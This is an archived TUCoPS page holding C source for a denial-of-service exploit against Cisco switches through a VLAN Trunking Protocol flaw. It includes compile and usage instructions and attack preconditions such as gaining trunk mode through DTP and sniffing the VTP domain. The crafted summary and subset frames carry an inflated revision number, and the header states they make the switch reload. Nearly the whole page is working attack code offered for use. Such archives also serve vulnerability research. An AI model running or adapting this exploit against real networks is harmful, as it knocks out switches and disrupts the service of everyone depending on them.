TUCoPS :: HP Unsorted D :: va2309.htm

DoS code for Cisco VLAN Trunking Protocol Vulnerability
DoS code for Cisco VLAN Trunking Protocol Vulnerability
DoS code for Cisco VLAN Trunking Protocol Vulnerability



/*DoS code for Cisco VLAN Trunking Protocol Vulnerability=0D
 *=0D
 *vulerability discription:=0D
*http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml=0D 
 *=0D
 *To Known:=0D
 * 1.the switch must in Server/Client Mode.=0D
 * 2.the port ,attacker connected,must be in trunk Mode.=0D
 *   Cisco Ethernet ports with no configuration are not=0D
 *   in trunk.but trunk mode can be obtained through DTP=0D
 *   attack by Yersinia.=0D
 * 3.you must known the vtp domain,this can be sniffed=0D
 * 4.some codes are from Yersinia.=0D
 *=0D
 *Result:=0D
 * switch reload.=0D
 *=0D
 *=0D
 *Compile:=0D
 * gcc -o vtp `libnet-config --libs` vtp.c=0D
 *=0D
 *Usage:vtp -i  -d =0D
 *=0D
 *Contact: showrun.lee[AT]gmail.com=0D
*http://sh0wrun.blogspot.com/=0D 
 */=0D
#include =0D
#include =0D
#include =0D
=0D
#define VTP_DOMAIN_SIZE    32=0D
#define VTP_TIMESTAMP_SIZE 12=0D
=0D
struct vtp_summary {=0D
     u_int8_t  version;=0D
     u_int8_t  code;=0D
     u_int8_t  followers;=0D
     u_int8_t  dom_len;=0D
     u_int8_t  domain[VTP_DOMAIN_SIZE];=0D
     u_int32_t revision;=0D
     u_int32_t updater;=0D
     u_int8_t  timestamp[VTP_TIMESTAMP_SIZE];=0D
     u_int8_t  md5[16];=0D
};=0D
=0D
struct vtp_subset {=0D
     u_int8_t  version;=0D
     u_int8_t  code;=0D
     u_int8_t  seq;=0D
     u_int8_t  dom_len;=0D
     u_int8_t  domain[VTP_DOMAIN_SIZE];=0D
     u_int32_t revision;=0D
};=0D
=0D
void usage( char *s) {=0D
    printf("%s -i  -d \n",s);=0D
    exit (1);=0D
}=0D
=0D
int main( int argc, char *argv[] )=0D
{=0D
    int opt,k=0;=0D
    extern char *optarg;=0D
    libnet_ptag_t t;=0D
    libnet_t *lhandler;=0D
    u_int32_t vtp_len=0, sent;=0D
    struct vtp_summary *vtp_summ;=0D
    struct vtp_subset *vtp_sub;=0D
    u_int8_t *vtp_packet,*vtp_packet2, *aux;=0D
    u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };=0D
    u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };=0D
    u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00,0x00,0x00 };=0D
    struct libnet_ether_addr *mymac;=0D
    char *device;=0D
    char error_information[LIBNET_ERRBUF_SIZE];=0D
    char *domain;=0D
=0D
// get options=0D
     while ((opt = getopt(argc, argv, "i:d:")) != -1)=0D
     {=0D
          switch (opt) {=0D
          case 'i':=0D
          device=malloc(strlen(optarg));=0D
          strcpy(device,optarg);=0D
      k=1;=0D
          break;=0D
=0D
          case 'd':=0D
          domain=malloc(strlen(optarg));=0D
          strcpy(domain,optarg);=0D
          break;=0D
         =0D
          default: usage(argv[0]);=0D
          }=0D
     }=0D
     if(!k) { printf("  %s -i  -d \n     must assign the interface\n",argv[0]);exit(1);}=0D
=0D
//init libnet=0D
=0D
    lhandler=libnet_init(LIBNET_LINK,device,error_information);=0D
    if (!lhandler) {=0D
             fprintf(stderr, "libnet_init: %s\n", error_information);=0D
             return -1;=0D
     }=0D
=0D
    mymac=libnet_get_hwaddr(lhandler);=0D
//build the first packet for vtp_summary=0D
    vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);=0D
    vtp_packet = calloc(1,vtp_len);=0D
    aux = vtp_packet;=0D
    memcpy(vtp_packet,cisco_data,sizeof(cisco_data));=0D
    aux+=sizeof(cisco_data);=0D
    vtp_summ = (struct vtp_summary *)aux;=0D
    vtp_summ->version = 0x01;=0D
    vtp_summ->code = 0x01;//vtp_summary=0D
    vtp_summ->followers = 0x01;=0D
    vtp_summ->dom_len = strlen(domain);=0D
    memcpy(vtp_summ->domain,domain,strlen(domain));=0D
    vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok=0D
    t = libnet_build_802_2(=0D
        0xaa,            /* DSAP */=0D
        0xaa,            /* SSAP */=0D
        0x03,            /* control */=0D
        vtp_packet,      /* payload */=0D
        vtp_len,         /* payload size */=0D
        lhandler,        /* libnet handle */=0D
        0);              /* libnet id */=0D
    t = libnet_build_802_3(=0D
        dst_mac,       /* ethernet destination */=0D
        mymac->ether_addr_octet,     /* ethernet source */=0D
        LIBNET_802_2_H + vtp_len, /* frame size */=0D
        NULL,                     /* payload */=0D
        0,                        /* payload size */=0D
        lhandler,                 /* libnet handle */=0D
        0);                       /* libnet id */=0D
=0D
     sent = libnet_write(lhandler);=0D
=0D
     if (sent == -1) {=0D
        libnet_clear_packet(lhandler);=0D
        free(vtp_packet);=0D
        return -1;=0D
     }=0D
     libnet_clear_packet(lhandler);=0D
    =0D
//build the second vtp packet for vtp_subset=0D
     vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);=0D
     vtp_packet2 = calloc(1,vtp_len);=0D
     aux = vtp_packet2;=0D
     memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));=0D
     aux+=sizeof(cisco_data);=0D
    =0D
     vtp_sub = (struct vtp_subset *)aux;=0D
     vtp_sub->version = 0x01;=0D
     vtp_sub->code = 0x02; //vtp_subset=0D
     vtp_sub->seq = 0x01;=0D
     vtp_sub->dom_len = strlen(domain);=0D
     memcpy(vtp_sub->domain,domain,strlen(domain));=0D
     vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok=0D
//     memcpy(vtp_sub->aaa,aaa,strlen(aaa));=0D
    =0D
    t = libnet_build_802_2(=0D
        0xaa,            /* DSAP */=0D
        0xaa,            /* SSAP */=0D
        0x03,            /* control */=0D
        vtp_packet2,      /* payload */=0D
        vtp_len,         /* payload size */=0D
        lhandler,        /* libnet handle */=0D
        0);              /* libnet id */=0D
    t = libnet_build_802_3(=0D
        dst_mac,       /* ethernet destination */=0D
        mymac->ether_addr_octet,     /* ethernet source */=0D
        LIBNET_802_2_H + vtp_len, /* frame size */=0D
        NULL,                     /* payload */=0D
        0,                        /* payload size */=0D
        lhandler,                 /* libnet handle */=0D
        0);                       /* libnet id */=0D
=0D
     sent = libnet_write(lhandler);=0D
     if (sent == -1) {=0D
        libnet_clear_packet(lhandler);=0D
        free(vtp_packet);=0D
        return -1;=0D
     }=0D
     libnet_clear_packet(lhandler);=0D
}

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH